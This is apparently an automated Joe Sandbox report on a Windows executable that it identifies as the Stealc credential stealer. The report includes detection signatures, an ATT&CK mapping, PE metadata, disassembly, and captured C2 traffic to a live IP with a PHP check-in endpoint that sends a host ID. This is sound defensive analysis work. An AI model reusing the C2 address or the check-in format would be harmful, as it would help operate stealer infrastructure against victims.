                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.190000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2018399242.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1360, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.phpsfile.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206file.exe, 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.206/lfile.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/6c4adf523b719729.php;file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206/6c4adf523b719729.phpkfile.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/Ifile.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/6c4adf523b719729.php&file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2018399242.0000000004C8B000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.206
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1546643
                                  Start date and time:2024-11-01 10:56:05 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 3s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 131
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                  • 185.215.113.17

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.958325842579587
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:2'134'016 bytes
                                  MD5:fbc1650a9c7f6f7c01aa9c1bd71cf2cb
                                  SHA1:02a2bbc7edf8712575e11ca3a5b2fb38255b6851
                                  SHA256:2222b91f09e31a309de68a2d7f66ef1ba8588d5fd0c92c6b15ca4d57622d509f
                                  SHA512:58558bdc6385a1991c315a5c46b296e9c77ef8eb689f6f32f6a3270d0e2c19576bec877441c73697843f0a8d33b6b3c3deb7eddcc0491c5f4dedab2e5eba97d2
                                  SSDEEP:49152:8fc9iSlMYFmn4/S0e4VJOfNcsNTPN5eLIzY:8ffSlMOZRbRsNpPY
                                  TLSH:63A533BB5B23F028C612B9BD84C4B2C3E5F4541404805AB8D57995E7ADBFAFC3422DDA
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0xb2b000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007FB4188DF21Ah
                                  movd mm4, dword ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dl
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [edx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  pop es
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x2e70000x676005f601062f990e1a7adb0e51807afdaa9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x2ea0000x2a20000x200bfebc900ee639e8936d0384618c4726eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  jfbmubxy0x58c0000x19e0000x19e0006795041e7f2dc1e9af7fa1cbef482dd2False0.9951572878925121data7.954398725393829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  qpyydaeu0x72a0000x10000x400ecaaf8b9e713db4d088a1899474ebf61False0.70703125data5.715370383063398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x72b0000x30000x22008d305e55fccd7aa69356d2a0100ad1f3False0.05847886029411765DOS executable (COM)0.7759250538043629IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-11-01T10:56:57.782133+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 1, 2024 10:56:56.550436020 CET4970480192.168.2.5185.215.113.206
                                  Nov 1, 2024 10:56:56.555615902 CET8049704185.215.113.206192.168.2.5
                                  Nov 1, 2024 10:56:56.555736065 CET4970480192.168.2.5185.215.113.206
                                  Nov 1, 2024 10:56:56.555999041 CET4970480192.168.2.5185.215.113.206
                                  Nov 1, 2024 10:56:56.560856104 CET8049704185.215.113.206192.168.2.5
                                  Nov 1, 2024 10:56:57.474788904 CET8049704185.215.113.206192.168.2.5
                                  Nov 1, 2024 10:56:57.474996090 CET4970480192.168.2.5185.215.113.206
                                  Nov 1, 2024 10:56:57.479866028 CET4970480192.168.2.5185.215.113.206
                                  Nov 1, 2024 10:56:57.485733986 CET8049704185.215.113.206192.168.2.5
                                  Nov 1, 2024 10:56:57.781995058 CET8049704185.215.113.206192.168.2.5
                                  Nov 1, 2024 10:56:57.782133102 CET4970480192.168.2.5185.215.113.206
                                  Nov 1, 2024 10:57:00.572268009 CET4970480192.168.2.5185.215.113.206

                                  HTTP Request Dependency Graph

                                  • 185.215.113.206

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704185.215.113.206801360C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Nov 1, 2024 10:56:56.555999041 CET90OUTGET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Nov 1, 2024 10:56:57.474788904 CET203INHTTP/1.1 200 OK
                                  Date: Fri, 01 Nov 2024 09:56:57 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Nov 1, 2024 10:56:57.479866028 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 30 31 38 41 37 39 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a
                                  Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="hwid"F9C8018A799D1524750037------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build"tale------IIEBGIDAAFHIJJJJEGCG--
                                  Nov 1, 2024 10:56:57.781995058 CET210INHTTP/1.1 200 OK
                                  Date: Fri, 01 Nov 2024 09:56:57 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:05:56:53
                                  Start date:01/11/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x190000
                                  File size:2'134'016 bytes
                                  MD5 hash:FBC1650A9C7F6F7C01AA9C1BD71CF2CB
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2018399242.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:2.9%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:2.9%
                                    Total number of Nodes:1327
                                    Total number of Limit Nodes:24
                                    execution_graph 37598 1a6c90 37643 1922a0 37598->37643 37622 1a6d04 37623 1aacc0 4 API calls 37622->37623 37624 1a6d0b 37623->37624 37625 1aacc0 4 API calls 37624->37625 37626 1a6d12 37625->37626 37627 1aacc0 4 API calls 37626->37627 37628 1a6d19 37627->37628 37629 1aacc0 4 API calls 37628->37629 37630 1a6d20 37629->37630 37795 1aabb0 37630->37795 37632 1a6dac 37799 1a6bc0 GetSystemTime 37632->37799 37634 1a6d29 37634->37632 37636 1a6d62 OpenEventA 37634->37636 37638 1a6d79 37636->37638 37639 1a6d95 CloseHandle Sleep 37636->37639 37642 1a6d81 CreateEventA 37638->37642 37641 1a6daa 37639->37641 37640 1a6db6 CloseHandle ExitProcess 37641->37634 37642->37632 37996 194610 37643->37996 37645 1922b4 37646 194610 2 API calls 37645->37646 37647 1922cd 37646->37647 37648 194610 2 API calls 37647->37648 37649 1922e6 37648->37649 37650 194610 2 API calls 37649->37650 37651 1922ff 37650->37651 37652 194610 2 API calls 37651->37652 37653 192318 37652->37653 37654 194610 2 API calls 37653->37654 37655 192331 37654->37655 37656 194610 2 API calls 37655->37656 37657 19234a 37656->37657 37658 194610 2 API calls 37657->37658 37659 192363 37658->37659 37660 194610 2 API calls 37659->37660 37661 19237c 37660->37661 37662 194610 2 API calls 37661->37662 37663 192395 37662->37663 37664 194610 2 API calls 37663->37664 37665 1923ae 37664->37665 37666 194610 2 API calls 37665->37666 37667 1923c7 37666->37667 37668 194610 2 API calls 37667->37668 37669 1923e0 37668->37669 37670 194610 2 API calls 37669->37670 37671 1923f9 37670->37671 37672 194610 2 API calls 37671->37672 37673 192412 37672->37673 37674 194610 2 API calls 37673->37674 37675 19242b 37674->37675 37676 194610 2 API calls 37675->37676 37677 192444 37676->37677 37678 194610 2 API calls 37677->37678 37679 19245d 37678->37679 37680 194610 2 API calls 37679->37680 37681 192476 37680->37681 37682 194610 2 API calls 37681->37682 37683 19248f 37682->37683 37684 194610 2 API calls 37683->37684 37685 1924a8 37684->37685 37686 194610 2 API calls 37685->37686 37687 1924c1 37686->37687 37688 194610 2 API calls 37687->37688 37689 1924da 37688->37689 37690 194610 2 API calls 37689->37690 37691 1924f3 37690->37691 37692 194610 2 API calls 37691->37692 37693 19250c 37692->37693 37694 194610 2 API calls 37693->37694 37695 192525 37694->37695 37696 194610 2 API calls 37695->37696 37697 19253e 37696->37697 37698 194610 2 API calls 37697->37698 37699 192557 37698->37699 37700 194610 2 API calls 37699->37700 37701 192570 37700->37701 37702 194610 2 API calls 37701->37702 37703 192589 37702->37703 37704 194610 2 API calls 37703->37704 37705 1925a2 37704->37705 37706 194610 2 API calls 37705->37706 37707 1925bb 37706->37707 37708 194610 2 API calls 37707->37708 37709 1925d4 37708->37709 37710 194610 2 API calls 37709->37710 37711 1925ed 37710->37711 37712 194610 2 API calls 37711->37712 37713 192606 37712->37713 37714 194610 2 API calls 37713->37714 37715 19261f 37714->37715 37716 194610 2 API calls 37715->37716 37717 192638 37716->37717 37718 194610 2 API calls 37717->37718 37719 192651 37718->37719 37720 194610 2 API calls 37719->37720 37721 19266a 37720->37721 37722 194610 2 API calls 37721->37722 37723 192683 37722->37723 37724 194610 2 API calls 37723->37724 37725 19269c 37724->37725 37726 194610 2 API calls 37725->37726 37727 1926b5 37726->37727 37728 194610 2 API calls 37727->37728 37729 1926ce 37728->37729 37730 1a9bb0 37729->37730 38001 1a9aa0 GetPEB 37730->38001 37732 1a9bb8 37733 1a9bca 37732->37733 37734 1a9de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37732->37734 37737 1a9bdc 21 API calls 37733->37737 37735 1a9e5d 37734->37735 37736 1a9e44 GetProcAddress 37734->37736 37738 1a9e96 37735->37738 37739 1a9e66 GetProcAddress GetProcAddress 37735->37739 37736->37735 37737->37734 37740 1a9eb8 37738->37740 37741 1a9e9f GetProcAddress 37738->37741 37739->37738 37742 1a9ed9 37740->37742 37743 1a9ec1 GetProcAddress 37740->37743 37741->37740 37744 1a9ee2 GetProcAddress GetProcAddress 37742->37744 37745 1a6ca0 37742->37745 37743->37742 37744->37745 37746 1aaa50 37745->37746 37747 1aaa60 37746->37747 37748 1a6cad 37747->37748 37749 1aaa8e lstrcpy 37747->37749 37750 1911d0 37748->37750 37749->37748 37751 1911e8 37750->37751 37752 19120f ExitProcess 37751->37752 37753 191217 37751->37753 37754 191160 GetSystemInfo 37753->37754 37755 19117c ExitProcess 37754->37755 37756 191184 37754->37756 37757 191110 GetCurrentProcess VirtualAllocExNuma 37756->37757 37758 191149 37757->37758 37759 191141 ExitProcess 37757->37759 38002 1910a0 VirtualAlloc 37758->38002 37762 191220 38006 1a8b40 37762->38006 37765 191249 37766 19129a 37765->37766 37767 191292 ExitProcess 37765->37767 37768 1a6a10 GetUserDefaultLangID 37766->37768 37769 1a6a32 37768->37769 37770 1a6a73 37768->37770 37769->37770 37771 1a6a6b ExitProcess 37769->37771 37772 1a6a4d ExitProcess 37769->37772 37773 1a6a43 ExitProcess 37769->37773 37774 1a6a61 ExitProcess 37769->37774 37775 1a6a57 ExitProcess 37769->37775 37776 191190 37770->37776 37777 1a7a70 3 API calls 37776->37777 37778 19119e 37777->37778 37779 1911cc 37778->37779 37780 1a79e0 3 API calls 37778->37780 37783 1a79e0 GetProcessHeap RtlAllocateHeap GetUserNameA 37779->37783 37781 1911b7 37780->37781 37781->37779 37782 1911c4 ExitProcess 37781->37782 37784 1a6cd0 37783->37784 37785 